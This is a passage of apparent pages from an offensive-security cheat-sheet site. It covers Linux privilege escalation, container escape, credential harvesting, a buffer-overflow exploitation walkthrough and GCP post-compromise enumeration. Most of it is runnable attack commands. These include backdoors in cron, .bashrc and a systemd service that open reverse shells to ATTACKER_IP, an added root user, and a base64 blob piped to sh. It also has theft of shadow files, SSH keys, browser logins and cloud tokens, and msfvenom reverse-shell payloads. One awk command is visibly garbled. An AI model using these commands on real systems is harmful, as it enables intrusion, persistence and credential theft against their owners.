/bin/bash /tmp/bash; chmod +s /tmp/bash' >> /path/to/cron/script.sh # Wait for execution, then: /tmp/bash -p # PATH hijacking in cron # If cron script doesn't use absolute paths echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /tmp/command_name chmod +x /tmp/command_name export PATH=/tmp:$PATH Copy # Check kernel version uname -a cat /proc/version cat /etc/*release # Kernel exploit suggester # https://github.com/mzet-/linux-exploit-suggester ./linux-exploit-suggester.sh # https://github.com/jondonas/linux-exploit-suggester-2 perl linux-exploit-suggester-2.pl # Common kernel exploits # DirtyPipe (CVE-2022-0847) - Linux 5.8+ # https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits # DirtyCow (CVE-2016-5195) - Linux 2.6.22 to 4.8.3 # https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs # PwnKit (CVE-2021-4034) - Polkit # https://github.com/ly4k/PwnKit curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit chmod +x PwnKit && ./PwnKit # Dirty Sock (CVE-2019-7304) - Snapd # https://github.com/initstring/dirty_sock Copy # Check for NFS shares showmount -e cat /etc/exports # If no_root_squash is set # Mount on attacker machine: mkdir /tmp/nfs mount -o rw,vers=2 :/share /tmp/nfs # Create SUID binary: cp /bin/bash /tmp/nfs/bash chmod +s /tmp/nfs/bash # On target: /share/bash -p Copy # Writable /etc/passwd # Add new root user echo 'hacker:$(openssl passwd -1 password):0:0:root:/root:/bin/bash' >> /etc/passwd # Or use pre-computed hash echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0::/root:/bin/bash' >> /etc/passwd su hacker # Writable /etc/shadow # Generate hash: mkpasswd -m sha-512 password # Replace root hash # Find world-writable files find / -writable -type f 2>/dev/null find / -perm -2 -type f 2>/dev/null # Find writable directories find / -writable -type d 2>/dev/null # Find files owned by current user find / -user $(whoami) 2>/dev/null Copy # Check if in Docker cat /proc/1/cgroup | grep docker ls -la /.dockerenv # If docker socket is mounted docker run -v /:/mnt --rm -it alpine chroot /mnt sh # Privileged container escape # https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/ mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x echo 1 > /tmp/cgrp/x/notify_on_release echo "$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)/cmd" > /tmp/cgrp/release_agent echo '#!/bin/sh' > /cmd echo "cat /etc/shadow > $(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)/output" >> /cmd chmod a+x /cmd sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" Copy # Memory dumps # https://github.com/huntergregal/mimipenguin ./mimipenguin.py # Extract from process memory strings /proc/*/environ 2>/dev/null | grep -i pass strings /proc/*/cmdline 2>/dev/null | grep -i pass # History files cat ~/.bash_history cat ~/.zsh_history cat ~/.mysql_history cat ~/.psql_history # Configuration files find / -name "*.conf" -exec grep -l "pass\|password\|pwd" {} \; 2>/dev/null find / -name "*.config" -exec grep -l "pass\|password\|pwd" {} \; 2>/dev/null find / -name "*.xml" -exec grep -l "pass\|password\|pwd" {} \; 2>/dev/null find / -name "*.ini" -exec grep -l "pass\|password\|pwd" {} \; 2>/dev/null find / -name "*.env" 2>/dev/null # SSH keys find / -name "id_rsa" 2>/dev/null find / -name "id_dsa" 2>/dev/null find / -name "id_ecdsa" 2>/dev/null find / -name "id_ed25519" 2>/dev/null find / -name "authorized_keys" 2>/dev/null # Web application configs cat /var/www/html/wp-config.php 2>/dev/null cat /var/www/html/config.php 2>/dev/null cat /var/www/html/.env 2>/dev/null # Database credentials cat ~/.my.cnf cat /etc/mysql/debian.cnf # Shadow file cracking unshadow /etc/passwd /etc/shadow > unshadowed.txt john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt hashcat -m 1800 -a 0 shadow.txt rockyou.txt # SHA-512 hashcat -m 500 -a 0 shadow.txt rockyou.txt # MD5 # Browser credentials # Firefox cat ~/.mozilla/firefox/*.default*/logins.json # Chrome cat ~/.config/google-chrome/Default/Login\ Data # Decrypt with: https://github.com/unode/firefox_decrypt # Gnome Keyring # https://github.com/abuse-of-gnome-keyring Copy # SSH authorized_keys echo "attacker_public_key" >> ~/.ssh/authorized_keys chmod 600 ~/.ssh/authorized_keys # Cron persistence echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" | crontab - # Bashrc/Profile echo 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 &' >> ~/.bashrc echo '/tmp/.hidden_shell &' >> ~/.profile # Systemd service (requires root) cat > /etc/systemd/system/backdoor.service << EOF [Unit] Description=Backdoor Service [Service] Type=simple ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1' Restart=always RestartSec=60 [Install] WantedBy=multi-user.target EOF systemctl enable backdoor.service systemctl start backdoor.service # LD_PRELOAD persistence # Add to /etc/ld.so.preload (requires root) echo "/tmp/malicious.so" >> /etc/ld.so.preload # SUID backdoor cp /bin/bash /tmp/.bash chmod u+s /tmp/.bash # Access: /tmp/.bash -p # PAM backdoor (requires root) # https://github.com/zephrax/linux-pam-backdoor Copy # Using found SSH keys ssh -i id_rsa user@target # Password reuse crackmapexec ssh targets.txt -u user -p 'password' hydra -l user -p password ssh://target # Kerberos from Linux # https://github.com/fortra/impacket # Get TGT getTGT.py -dc-ip DC_IP DOMAIN/user:password # Use ticket export KRB5CCNAME=/path/to/ticket.ccache psexec.py -k -no-pass DOMAIN/user@target # Pass-the-Hash pth-winexe -U DOMAIN/user%hash //target cmd.exe crackmapexec smb target -u user -H hash # NTLM relay ntlmrelayx.py -tf targets.txt -smb2support # Port forwarding for internal access ssh -L 8080:internal_host:80 user@pivot ssh -D 9050 user@pivot # SOCKS proxy Copy **Tools** https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh https://github.com/mbahadou/postenum/blob/master/postenum.sh https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32 https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64 https://gtfobins.github.io/ # Spawning shell python -c 'import pty; pty.spawn("/bin/bash")' python -c 'import pty; pty.spawn("/bin/sh")' echo os.system('/bin/bash') /bin/sh -i perl -e 'exec "/bin/sh";' ruby: exec "/bin/sh" lua: os.execute('/bin/sh') (From within vi) :!bash :set shell=/bin/bash:shell (From within nmap) !sh # Access to more binaries export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin # Download files from attacker wget http://10.11.1.111:8080/ -r; mv 10.11.1.111:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linpeas.sh postenum.sh pspy32 pspy64 # Enum scripts ./LinEnum.sh -t -k password -r LinEnum.txt ./postenum.sh ./linpeas.sh ./pspy # Common writable directories /tmp /var/tmp /dev/shm # Add user to sudoers useradd hacker passwd hacker echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers # sudo permissions sudo -l -l # Journalctl If you can run as root, run in small window and !/bin/sh # Crons crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root cat /etc/frontal cat /etc/anacron systemctl list-timers --all # Common info uname -a env id cat /proc/version cat /etc/issue cat /etc/passwd cat /etc/group cat /etc/shadow cat /etc/hosts # Users with login grep -vE "nologin" /etc/passwd # Network info cat /proc/net/arp cat /proc/net/fib_trie cat /proc/net/fib_trie | grep "|--" | egrep -v "0.0.0.0| 127." awk '/32 host/ { print f } {f=$2}' <<< "$(0; i-=2) { ret = ret"."hextodec(substr(str,i,2)) } ret = ret":"hextodec(substr(str,index(str,":")+1,4)) return ret } NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp # Netstat without netstat 2 echo "YXdrICdmdW5jdGlvbiBoZXh0b2RlYyhzdHIscmV0LG4saSxrLGMpewogICAgcmV0ID0gMAogICAgbiA9IGxlbmd0aChzdHIpCiAgICBmb3IgKGkgPSAxOyBpIDw9IG47IGkrKykgewogICAgICAgIGMgPSB0b2xvd2VyKHN1YnN0cihzdHIsIGksIDEpKQogICAgICAgIGsgPSBpbmRleCgiMTIzNDU2Nzg5YWJjZGVmIiwgYykKICAgICAgICByZXQgPSByZXQgKiAxNiArIGsKICAgIH0KICAgIHJldHVybiByZXQKfQpmdW5jdGlvbiBnZXRJUChzdHIscmV0KXsKICAgIHJldD1oZXh0b2RlYyhzdWJzdHIoc3RyLGluZGV4KHN0ciwiOiIpLTIsMikpOyAKICAgIGZvciAoaT01OyBpPjA7IGktPTIpIHsKICAgICAgICByZXQgPSByZXQiLiJoZXh0b2RlYyhzdWJzdHIoc3RyLGksMikpCiAgICB9CiAgICByZXQgPSByZXQiOiJoZXh0b2RlYyhzdWJzdHIoc3RyLGluZGV4KHN0ciwiOiIpKzEsNCkpCiAgICByZXR1cm4gcmV0Cn0gCk5SID4gMSB7e2lmKE5SPT0yKXByaW50ICJMb2NhbCAtIFJlbW90ZSI7bG9jYWw9Z2V0SVAoJDIpO3JlbW90ZT1nZXRJUCgkMyl9e3ByaW50IGxvY2FsIiAtICJyZW1vdGV9fScgL3Byb2MvbmV0L3RjcCAKqtc" | base64 -d | sh # Nmap without nmap for ip in {1..5}; do for port in {21,22,5000,8000,3306}; do (echo >/dev/tcp/172.18.0.$ip/$port) >& /dev/null && echo "172.18.0.$ip port $port is open"; done; done # Open ports without netstat grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}' # Check ssh files: cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key # SUID find / -perm -4000 -type f 2>/dev/null # ALL PERMS find / -perm -777 -type f 2>/dev/null # SUID for current user find / perm /u=s -user `whoami` 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null # Writables for current user/group find / perm /u=w -user `whoami` 2>/dev/null find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null find / -perm /u+w -user `whoami` 2>/dev/nul # Dirs with +w perms for current u/g find / perm /u=w -type -d -user `whoami` 2>/dev/null find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null # Port Forwarding # Chisel # Victim server: chisel server --auth "test:123" -p 443 --reverse # In host attacker machine: ./chisel client --auth "test:123" 10.10.10.10:443 R:socks # Dynamic Port Forwarding: # Attacker machine: ssh -D 9050 user@host # Attacker machine Burp Proxy - SOCKS Proxy: Mark ā€œOverride User Optionsā€ Mark Use Socks Proxy: SOCKS host:127.0.0.1 SOCKS port:9050 # Tunneling Target must have SSH running for there service 1. Create SSH Tunnel: ssh -D localhost: -f -N user@localhost -p 2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf) 3. Add the following line into the config: Socks5 127.0.0.1 4. Run commands through the tunnel: proxychains # SShuttle # https://github.com/sshuttle/sshuttle sshuttle -r root@172.21.0.0 10.2.2.0/24 # netsh port forwarding netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80 netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000 Copy # First check your shell echo $SHELL # and commands export # vim # List files :!/bin/ls -l .b* # Set new shell :set shell=/bin/sh :shell # or :!/bin/sh # ed !'/bin/sh' # ne -> Load Prefs -> Navigate everywhere # more/less/man/pinfo !'sh' # links -> File OS Shell # lynx -> "o" for options -> configure default editor e.g. vim lynx --editor=/usr/bin/vim www.google.com # or export EDITOR=/usr/bin/vim # navigate to https://translate.google.com/ go to text box, ENTER and F4 # mutt ! # find find / -name "root" -exec /bin/sh \; find / -name "root" -exec /bin/awk 'BEGIN {system("/bin/sh")}' \; # nmap < 2009/05 --interactive !sh # awk awk 'BEGIN {system("/bin/sh")}' # expect expect -c 'spawn sh' -i # python python -c 'import pty; pty.spawn("/bin/sh")' # ruby irb exec '/bin/sh' # perl perl -e 'system("sh -i");' perl -e 'exec("sh -i");' # php -a exec("sh -i"); # Only Rbash echo x | xargs -Iy sh -c 'exec sh 0<&1' # Emacs Mod-! /bin/sh # cp cp /bin/sh /dev/shm/sh; /dev/shm/sh # export export SHELL=/bin/sh; export PATH=/bin:/usr/bin:$PATH # FTP/Telnet !/bin/sh # GDB !/bin/sh # eval eval echo echo {o..q}ython\; # tee echo '/bin/rm /home/user/.bashrc' | tee '/home/user/bin/win';win; echo 'export SHELL=/bin/sh' | tee '/home/user/.bashrc' # declare declare -n PATH; export PATH=/bin;bash -i BASH_CMDS[shell]=/bin/bash;shell -i # nano nano -s /bin/sh # Ctrl+T # SSH ssh user@host -t "bash --noprofile -i" ssh user@host -t "() { :; }; sh -i " Copy # Linux cat /etc/passwd cat /etc/shadow unshadow passwd shadow > unshadowed.txt john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt ifconfig -a arp -a tcpdump -i any -s0 -w capture.pcap tcpdump -i eth0 -w capture -n -U -s 0 src not 10.11.1.111 and dst not 10.11.1.111 tcpdump -vv -i eth0 src not 10.11.1.111 and dst not 10.11.1.111 .bash_history /var/mail /var/spool/mail echo $DESKTOP_SESSION echo $XDG_CURRENT_DESKTOP echo $GDMSESSION --- # Exploiting | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/others/exploiting.md) . #### [](https://www.pentest-book.com/others/exploiting#basics) Basics Copy **Tools** https://github.com/apogiatzis/gdb-peda-pwndbg-gef * gdb-peda * gdb-gef * pwndbg * radare2 * ropper * pwntools # Web compiler https://www.godbolt.org/ Copy # Check protections: checksec binary rabin2 -I ret2win32 # Functions rabin2 -i # Strings rabin2 -z ret2win32 #### [](https://www.pentest-book.com/others/exploiting#bof-basic-win32) BOF Basic Win32 #### [](https://www.pentest-book.com/others/exploiting#protections-bypasses) Protections bypasses #### [](https://www.pentest-book.com/others/exploiting#rop) ROP [PreviousBugBounty](https://www.pentest-book.com/others/bugbounty) [Nexttools everywhere](https://www.pentest-book.com/others/tools-everywhere) Last updated 6 years ago Was this helpful? Was this helpful? Copy 1. Send "A"*1024 2. Replace "A" with /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l LENGTH 3. When crash "!mona findmsp" (E10.11.1.111 offset) or ""/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q TEXT" or "!mona pattern_offset eip" 4. Confirm the location with "B" and "C" 5. Check for badchars instead CCCC (ESP): badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") with script _badchars.py and "!mona compare -a esp -f C:\Users\IEUser\Desktop\badchar_test.bin" 5.1 AWESOME WAY TO CHECK BADCHARS (https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/): a. !mona config -set workingfolder c:\logs\%p b. !mona bytearray -b "\x00\x0d" c. Copy from c:\logs\%p\bytearray.txt to python exploit and run again d. !mona compare -f C:\logs\%p\bytearray.bin -a 02F238D0 (ESP address) e. In " data", before unicode chars it shows badchars. 6. Find JMP ESP with "!mona modules" or "!mona jmp -r esp" or "!mona jmp -r esp -cpb '\x00\x0a\x0d'" find one with security modules "FALSE" 6.1 Then, "!mona find -s "\xff\xe4" -m PROGRAM/DLL-FALSE" 6.2 Remember put the JMP ESP location in reverse order due to endianness: 5F4A358F will be \x8f\x35\x4a\x5f 7. Generate shellcode and place it: msfvenom -p windows/shell_reverse_tcp LHOST=10.11.1.111 LPORT=4433 -f python –e x86/shikata_ga_nai -b "\x00" msfvenom -p windows/shell_reverse_tcp lhost=10.11.1.111 lport=443 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -f python -v shellcode 8. Final buffer like: buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode ############## sample 1 ################################################ #!/usr/bin/python import socket,sys if len(sys.argv) != 3: print("usage: python fuzzer.py 10.11.1.111 PORT") exit(1) payload = "A" * 1000 ipAddress = sys.argv[1] port = int(sys.argv[2]) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ipAddress, port)) s.recv(1024) print "Sending payload" s.send(payload) print "Done" s.close() except: print "Error" sys.exit(0) ############## sample 2 ################################################ #!/usr/bin/python import time, struct, sys import socket as so try: server = sys.argv[1] port = 5555 except IndexError: print "[+] Usage %s host" % sys.argv[0] sys.exit() req1 = "AUTH " + "\x41"*1072 s = so.socket(so.AF_INET, so.SOCK_STREAM) try: s.connect((server, port)) print repr(s.recv(1024)) s.send(req1) print repr(s.recv(1024)) except: print "[!] connection refused, check debugger" s.close() Copy # NX - Execution protection - Ret2libc https://sploitfun.wordpress.com/2015/05/08/bypassing-nx-bit-using-return-to-libc/ https://0x00sec.org/t/exploiting-techniques-000-ret2libc/1833 -ROP # ASLR - Random library positions - Memory leak to Ret2libc - ROP # Canary - Hex end buffer https://0x00sec.org/t/exploit-mitigation-techniques-stack-canaries/5085 - Value leak - Brute force - Format Strings: https://owasp.org/www-community/attacks/Format_string_attack Copy checksec # Listing functions imported from shared libraries is simple: rabin2 -i # Strings rabin2 -z # Relocations rabin2 -R # Listing just those functions written by the programmer is harder, a rough approximation could be: rabin2 -qs | grep -ve imp -e ' 0 ' RADARE2 ------------------------------------------ r2 -AAA binary # Analyze with radare2 afl # list functions pdf @ funcion # dissassemble function to check what instruction pointer want to reach iz # Strings is # Symbols px 48 @ 0x00601060 # Hex dump address dcu 0x00400809 # Breakpoint ā€œpress sā€ # Continue over breakpoint /R pop rdi # Search instruction /a pop rdi,ret # Search GDB ------------------------------------------ gdb-gef binary pattern create 200 pattern search ā€œlalalā€ r # run c # continue s # step si # step into b *0x0000000000401850 # Add breakpoint ib # Show breakpoints d1 # Remove breakpoint 1 d # Remove breakpoint info functions # Check functions x/s 0x400c2f # Examine address x/<(Mode)Format> Format:s(tring)/x(hex)/i(nstruction) Mode:l/w ROPGadget ------------------------------------------ https://github.com/JonathanSalwan/ROPgadget ROPgadget --binary callme32 --only "mov|pop|ret" Ropper ------------------------------------------ ropper --file callme32 --search "pop" readelf -S binary # Check writable locations x32 | syscall | arg0 | arg1 | arg2 | arg3 | arg4 | arg5 | +---------+------+------+------+------+------+------+ | %eax | %ebx | %ecx | %edx | %esi | %edi | %ebp | x64 | syscall | arg0 | arg1 | arg2 | arg3 | arg4 | arg5 | +---------+------+------+------+------+------+------+ | %rax | %rdi | %rsi | %rdx | %r10 | %r8 | %r9 | EXAMPLE ------------------------------------------ from pwn import * # Set up pwntools to work with this binary elf = context.binary = ELF('ret2win') io = process(elf.path) gdb.attach(io) info("%#x target", elf.symbols.ret2win) ret2win = p64(elf.symbols["ret2win"]) payload = "A"*40 + ret2win io.sendline(payload) io.recvuntil("Here's your flag:") # Get our flag! flag = io.recvall() success(flag) --- # GCP | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/enumeration/cloud/gcp.md) . [https://slashparity.com/?p=938slashparity.com](https://slashparity.com/?p=938) [](https://www.pentest-book.com/enumeration/cloud/gcp#general) General --------------------------------------------------------------------------- Copy **Tools** # PurplePanda https://github.com/carlospolop/PurplePanda # Hayat https://github.com/DenizParlak/hayat # GCPBucketBrute https://github.com/RhinoSecurityLabs/GCPBucketBrute # GCP IAM https://github.com/marcin-kolda/gcp-iam-collector # GCP Firewall Enum: https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_firewall_enum # Prowler https://github.com/prowler-cloud/prowler Auth methods: • Web Access • API – OAuth 2.0 protocol • Access tokens – short lived access tokens for service accounts • JSON Key Files – Long-lived key-pairs • Credentials can be federated Recon: • G-Suite Usage ā—‡ Try authenticating with a valid company email address at Gmail Google Storage Buckets: • Google Cloud Platform also has a storage service called ā€œBucketsā€ • Cloud_enum from Chris Moberly (@initstring) https://github.com/initstring/cloud_enum ā—‡ Awesome tool for scanning all three cloud services for buckets and more ā–Ŗ Enumerates: - GCP open and protected buckets as well as Google App Engine sites - Azure storage accounts, blob containers, hosted DBs, VMs, and WebApps - AWS open and protected buckets Phising G-Suite: • Calendar Event Injection • Silently injects events to target calendars • No email required • Google API allows to mark as accepted • Bypasses the ā€œdon’t auto-addā€ setting • Creates urgency w/ reminder notification • Include link to phishing page Steal Access Tokens: • Google JSON Tokens and credentials.db • JSON tokens typically used for service account access to GCP • If a user authenticates with gcloud from an instance their creds get stored here: ~/.config/gcloud/credentials.db sudo find /home -name "credentials.db" • JSON can be used to authenticate with gcloud and ScoutSuite Post-compromise • Cloud Storage, Compute, SQL, Resource manager, IAM • ScoutSuite from NCC group https://github.com/nccgroup/ScoutSuite • Tool for auditing multiple different cloud security providers • Create Google JSON token to auth as service account [](https://www.pentest-book.com/enumeration/cloud/gcp#enumeration) Enumeration ----------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/cloud/gcp#attacks) Attacks --------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/cloud/gcp#service-account-enumeration) Service Account Enumeration ------------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/cloud/gcp#iam-misconfigurations) IAM Misconfigurations ------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/cloud/gcp#gcs-bucket-attacks) GCS Bucket Attacks ------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/cloud/gcp#compute-metadata-abuse) Compute Metadata Abuse --------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/cloud/gcp#bigquery-data-exfiltration) BigQuery Data Exfiltration ----------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/cloud/gcp#cloud-functions-exploitation) Cloud Functions Exploitation --------------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/cloud/gcp#privilege-escalation) Privilege Escalation ----------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/cloud/gcp#persistence) Persistence ----------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/cloud/gcp#labs-and-practice) Labs & Practice --------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/cloud/gcp#tools) Tools ----------------------------------------------------------------------- [PreviousAzure](https://www.pentest-book.com/enumeration/cloud/azure) [NextDocker && Kubernetes](https://www.pentest-book.com/enumeration/cloud/docker-and-and-kubernetes) Last updated 5 months ago Was this helpful? * [General](https://www.pentest-book.com/enumeration/cloud/gcp#general) * [Enumeration](https://www.pentest-book.com/enumeration/cloud/gcp#enumeration) * [Attacks](https://www.pentest-book.com/enumeration/cloud/gcp#attacks) * [Service Account Enumeration](https://www.pentest-book.com/enumeration/cloud/gcp#service-account-enumeration) * [IAM Misconfigurations](https://www.pentest-book.com/enumeration/cloud/gcp#iam-misconfigurations) * [GCS Bucket Attacks](https://www.pentest-book.com/enumeration/cloud/gcp#gcs-bucket-attacks) * [Compute Metadata Abuse](https://www.pentest-book.com/enumeration/cloud/gcp#compute-metadata-abuse) * [BigQuery Data Exfiltration](https://www.pentest-book.com/enumeration/cloud/gcp#bigquery-data-exfiltration) * [Cloud Functions Exploitation](https://www.pentest-book.com/enumeration/cloud/gcp#cloud-functions-exploitation) * [Privilege Escalation](https://www.pentest-book.com/enumeration/cloud/gcp#privilege-escalation) * [Persistence](https://www.pentest-book.com/enumeration/cloud/gcp#persistence) * [Labs & Practice](https://www.pentest-book.com/enumeration/cloud/gcp#labs-and-practice) * [Tools](https://www.pentest-book.com/enumeration/cloud/gcp#tools) Was this helpful? Copy # Authentication with gcloud and retrieve info gcloud auth login gcloud auth activate-service-account --key-file creds.json gcloud auth activate-service-account --project= --key-file=filename.json gcloud auth list gcloud init gcloud config configurations activate stolenkeys gcloud config list gcloud organizations list gcloud organizations get-iam-policy gcloud projects get-iam-policy gcloud iam roles list --project= gcloud beta asset search-all-iam-policies --query policy:"projects/xxxxxxxx/roles/CustomRole436" --project=xxxxxxxx gcloud projects list gcloud config set project gcloud services list gcloud projects list gcloud config set project [Project-Id] gcloud source repos list gcloud source repos clone # Virtual Machines gcloud compute instances list gcloud compute instances list --impersonate-service-account AccountName gcloud compute instances list --configuration=stolenkeys gcloud compute instances describe gcloud compute instances describe --zone=ZoneName --format=json | jq -c '.serviceAccounts[].scopes[]' gcloud beta compute ssh --zone "" "" --project "" # Puts public ssh key onto metadata service for project gcloud compute ssh curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google’ # Use Google keyring to decrypt encrypted data gcloud kms decrypt --ciphertext-file=encrypted-file.enc --plaintext-file=out.txt --key --keyring --location global # Storage Buckets List Google Storage buckets gsutil ls gsutil ls -r gs:// gsutil cat gs://bucket-name/anyobject gsutil cp gs://bucketid/item ~/ # Webapps & SQL gcloud app instances list gcloud sql instances list gcloud spanner instances list gcloud bigtable instances list gcloud sql databases list --instance gcloud spanner databases list --instance # Export SQL databases and buckets # First copy buckets to local directory gsutil cp gs://bucket-name/folder/ . # Create a new storage bucket, change perms, export SQL DB gsutil mb gs:// gsutil acl ch -u gs:// gcloud sql export sql gs:///sqldump.gz --database= # Networking gcloud compute networks list gcloud compute networks subnets list gcloud compute vpn-tunnels list gcloud compute interconnects list gcloud compute firewall-rules list gcloud compute firewall-rules describe # Containers gcloud container clusters list # GCP Kubernetes config file ~/.kube/config gets generated when you are authenticated with gcloud container clusters get-credentials --region kubectl cluster-info # Serverless (Lambda functions) gcloud functions list gcloud functions describe gcloud functions logs read --limit # Gcloud stores creds in ~/.config/gcloud/credentials.db Search home directories sudo find /home -name "credentials.db # Copy gcloud dir to your own home directory to auth as the compromised user sudo cp -r /home/username/.config/gcloud ~/.config sudo chown -R currentuser:currentuser ~/.config/gcloud gcloud auth list # Databases gcloud sql databases list gcloud sql backups list --instance=test # Metadata Service URL # metadata.google.internal = 169.254.169.254 curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google" # Interesting metadata instance urls: http://169.254.169.254/computeMetadata/v1/ http://metadata.google.internal/computeMetadata/v1/ http://metadata/computeMetadata/v1/ http://metadata.google.internal/computeMetadata/v1/instance/hostname http://metadata.google.internal/computeMetadata/v1/instance/id http://metadata.google.internal/computeMetadata/v1/project/project-id # Get access scope http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google' # Get snapshot from instance and create instance from it gcloud compute snapshots list gcloud compute instances create instance-2 --source-snapshot=snapshot-1 --zone=us-central1-a Copy # Check ssh keys attached to instance gcloud compute instances describe instance-1 --zone=us-central1-a --format=json | jq '.metadata.items[].value' # Check for "privilegeduser:ssh-rsa" and generate ssh keys with same username and paste in file ssh-keygen -t rsa -C "privilegeduser" -f ./underprivuser # Something like: privilegeduser:ssh-rsa 